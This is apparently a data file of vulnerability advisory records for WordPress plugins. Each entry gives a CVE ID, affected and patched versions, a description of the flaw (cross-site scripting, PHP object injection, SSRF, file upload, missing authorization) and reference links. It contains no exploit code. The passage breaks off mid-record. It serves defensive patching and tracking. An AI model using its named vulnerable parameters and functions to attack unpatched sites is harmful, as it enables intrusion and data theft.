{"CVE_ID":"CVE-2024-10316","slug":"stratum","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.4 in includes\/templates\/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189021\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189021\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a1cf60b-47bd-4e67-8fe4-6cf46809f2b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a1cf60b-47bd-4e67-8fe4-6cf46809f2b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8622","slug":"amcharts-charts-and-maps","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The amCharts: Charts and Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'amcharts_javascript' parameter in all versions up to, and including, 1.4.4 due to the ability to supply arbitrary JavaScript and a lack of nonce validation on the preview functionality. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3593e8-3840-4db0-8269-61bbcb50d569?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e3593e8-3840-4db0-8269-61bbcb50d569?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amcharts-charts-and-maps\\\/tags\\\/1.4.4\\\/includes\\\/preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amcharts-charts-and-maps\\\/tags\\\/1.4.4\\\/includes\\\/preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150041\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12071","slug":"evergreen-content-poster","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Evergreen Content Poster \u2013 Auto Post and Schedule Your Best Content to Social Media plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_network_post() function in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to delete arbitrary posts and pages.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/admin\\\/class-evergreen_content_poster-admin.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/admin\\\/class-evergreen_content_poster-admin.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/includes\\\/class-evergreen_content_poster.php#L345\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/evergreen-content-poster\\\/trunk\\\/includes\\\/class-evergreen_content_poster.php#L345\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224190%40evergreen-content-poster&new=3224190%40evergreen-content-poster&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224190%40evergreen-content-poster&new=3224190%40evergreen-content-poster&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa07f48f-370f-4985-a6fc-a94ed5c59ed4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa07f48f-370f-4985-a6fc-a94ed5c59ed4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4659","slug":"cf7-salesforce","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Integration for Salesforce and Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299864\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299864\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99456c4-c828-4dc9-9375-8981eafbeb15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a99456c4-c828-4dc9-9375-8981eafbeb15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10787","slug":"lastudio-element-kit","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198563%40lastudio-element-kit&new=3198563%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198563%40lastudio-element-kit&new=3198563%40lastudio-element-kit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e63c0fb-7fe7-42f7-8fa9-ec159d3c8117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e63c0fb-7fe7-42f7-8fa9-ec159d3c8117?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6933","slug":"better-search-replace","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/895f2db1-a2ed-4a17-a4f6-cd13ee8f84af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/895f2db1-a2ed-4a17-a4f6-cd13ee8f84af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php#L334\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php#L334\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023674\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023674\\\/better-search-replace\\\/trunk\\\/includes\\\/class-bsr-db.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5738","slug":"wp-migration-duplicator","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The WordPress Backup & Migration WordPress plugin before 1.4.4 does not sanitise and escape some parameters, which could allow users with a role as low as Subscriber to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f935916-9a1a-40c7-b6d8-efcc46eb8eaf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f935916-9a1a-40c7-b6d8-efcc46eb8eaf\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0539","slug":"gs-instagram-portfolio","versionEndExcluding":"1.4.5","description":"The GS Insever Portfolio WordPress plugin before 1.4.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4b6a83a-6394-4dfc-8bb3-4982867dab7d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4b6a83a-6394-4dfc-8bb3-4982867dab7d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13728","slug":"easy-paypal-donation","versionImpact":"1.4.4","versionEndExcluding":"1.4.5","description":"The Accept Donations with PayPal & Stripe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the rf parameter in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-donation\\\/tags\\\/1.4.4\\\/core\\\/Base\\\/Stripe.php#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-paypal-donation\\\/tags\\\/1.4.4\\\/core\\\/Base\\\/Stripe.php#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3891a807-aace-460a-ad49-6a282af16084?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3891a807-aace-460a-ad49-6a282af16084?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10970","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.43","versionEndExcluding":"1.4.44","description":"The Motors \u2013 Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.4.43. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 1.4.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.42\\\/includes\\\/functions.php#L939\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/motors-car-dealership-classified-listings\\\/tags\\\/1.4.42\\\/includes\\\/functions.php#L939\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc58c679-3e87-4bcc-b1bc-718ae52c291a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc58c679-3e87-4bcc-b1bc-718ae52c291a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11360","slug":"page-parts","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Page Parts plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/getting-started.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/index.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-parts\\\/tags\\\/1.4.3\\\/admin\\\/documentation\\\/index.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72f3416a-4d5e-4b95-8f83-7b9440f9e9df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72f3416a-4d5e-4b95-8f83-7b9440f9e9df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5798","slug":"assistant","versionEndExcluding":"1.4.4","description":"The Assistant WordPress plugin before 1.4.4 does not validate a parameter before making a request to it via wp_remote_get(), which could allow users with a role as low as Editor to perform SSRF attacks","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbb4c98c-4dd7-421e-9666-98f15acde761\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbb4c98c-4dd7-421e-9666-98f15acde761\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3514","slug":"sureforms","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The SureForms WordPress plugin before 1.4.4 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc3da503-a973-44d8-82d0-13539501f8c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc3da503-a973-44d8-82d0-13539501f8c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3513","slug":"sureforms","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The SureForms WordPress plugin before 1.4.4 does not sanitise and escape some of its Form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd7e0bb3-4a98-4f62-bd2e-f30b27d71226\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd7e0bb3-4a98-4f62-bd2e-f30b27d71226\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5811","slug":"simple-media-directory","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Simple Video Directory WordPress plugin before 1.4.4 does not sanitise and escape some of its settings, which could allow contributors and higher to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf6c2e28-51ef-443b-b1c2-d555c7e12f7f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf6c2e28-51ef-443b-b1c2-d555c7e12f7f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11396","slug":"event-monster","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Event Monster \u2013 Event Management, Tickets Booking, Upcoming Event plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.3 via the Visitors List Export file. During the export, a CSV file is created in the wp-content folder with a hardcoded filename that is publicly accessible. This makes it possible for unauthenticated attackers to extract data about event visitors, that includes first and last names, email, and phone number.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-monster\\\/tags\\\/1.4.3\\\/em-ajax-prossesing\\\/em-visitor-ajax.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/event-monster\\\/tags\\\/1.4.3\\\/em-ajax-prossesing\\\/em-visitor-ajax.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f522dfe-f2c2-4adb-980c-1f03d3c26e12?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5322","slug":"vikrentcar","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The VikRentCar Car Rental Management System plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the do_updatecar and createcar functions in all versions up to, and including, 1.4.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server, which may make remote code execution possible.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1698\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vikrentcar\\\/tags\\\/1.4.3\\\/admin\\\/controller.php#L1698\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317493\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3317493\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f837ba2-64a2-4d8e-8212-b646cb94b0d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f837ba2-64a2-4d8e-8212-b646cb94b0d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7384","slug":"contact-form-entries","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.3 via deserialization of untrusted input in the get_lead_detail function. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain in the Contact Form 7 plugin, which is likely to be used alongside, allows attackers to delete arbitrary files, leading to a denial of service or remote code execution when the wp-config.php file is deleted.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/tags\\\/1.4.1\\\/includes\\\/data.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/tags\\\/1.4.1\\\/includes\\\/data.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338764\\\/#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338764\\\/#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129f810d-ff83-4428-9f98-6a6aa8817783?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129f810d-ff83-4428-9f98-6a6aa8817783?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5906","slug":"job-manager-career","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The Job Manager & Career WordPress plugin before 1.4.4 contains a vulnerability in the Directory Listings system, which allows an unauthorized user to view and download private files of other users. This vulnerability poses a serious security threat because it allows an attacker to gain access to confidential data and files of other users without their permission.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/911d495c-3867-4259-a73a-572cd4fccdde\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/911d495c-3867-4259-a73a-572cd4fccdde\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5737","slug":"wp-migration-duplicator","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The WordPress Backup & Migration WordPress plugin before 1.4.4 does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c761c67c-eab8-4e1b-a332-c9a45e22bb13\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c761c67c-eab8-4e1b-a332-c9a45e22bb13\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3471","slug":"sureforms","versionImpact":"1.4.3","versionEndExcluding":"1.4.4","description":"The SureForms WordPress plugin before 1.4.4 does not have a proper authorisation check when updating its settings via the REST API, which could allow Contributor and above roles to perform such an action.","recommendation":"Update to version 1.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa21dd2b-1277-4cf9-b7f6-d4f8a6d518c1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa21dd2b-1277-4cf9-b7f6-d4f8a6d518c1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0405","slug":"gpt3-ai-content-generator","versionEndExcluding":"1.4.38","description":"The GPT AI Power: Content Writer & ChatGPT & Image Generator & WooCommerce Product Writer & AI Training WordPress plugin before 1.4.38 does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca9ac21-2bce-4480-9079-b4045b261273\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca9ac21-2bce-4480-9079-b4045b261273\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4471","slug":"xpro-elementor-addons","versionImpact":"1.4.3.1","versionEndExcluding":"1.4.3.2","description":"The 140+ Widgets | Best Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.3.1 via deserialization of untrusted input in the 'export_content' function. This allows authenticated attackers, with contributor-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c517278-9d2a-4ef6-bf0e-a62f6b00dd20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c517278-9d2a-4ef6-bf0e-a62f6b00dd20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/libs\\\/demo-export\\\/classes\\\/class-demo-export-admin.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/libs\\\/demo-export\\\/classes\\\/class-demo-export-admin.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090127\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090127\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4440","slug":"xpro-elementor-addons","versionImpact":"1.4.3","versionEndExcluding":"1.4.3.1","description":"The 140+ Widgets | Best Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5596197e-149d-4072-9fa4-424c9ffd6059?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5596197e-149d-4072-9fa4-424c9ffd6059?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/custom-field\\\/custom-field.php#L1150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/custom-field\\\/custom-field.php#L1150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/contact-form\\\/contact-form.php#L1438\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/contact-form\\\/contact-form.php#L1438\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/post-grid\\\/post-grid.php#L1829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widg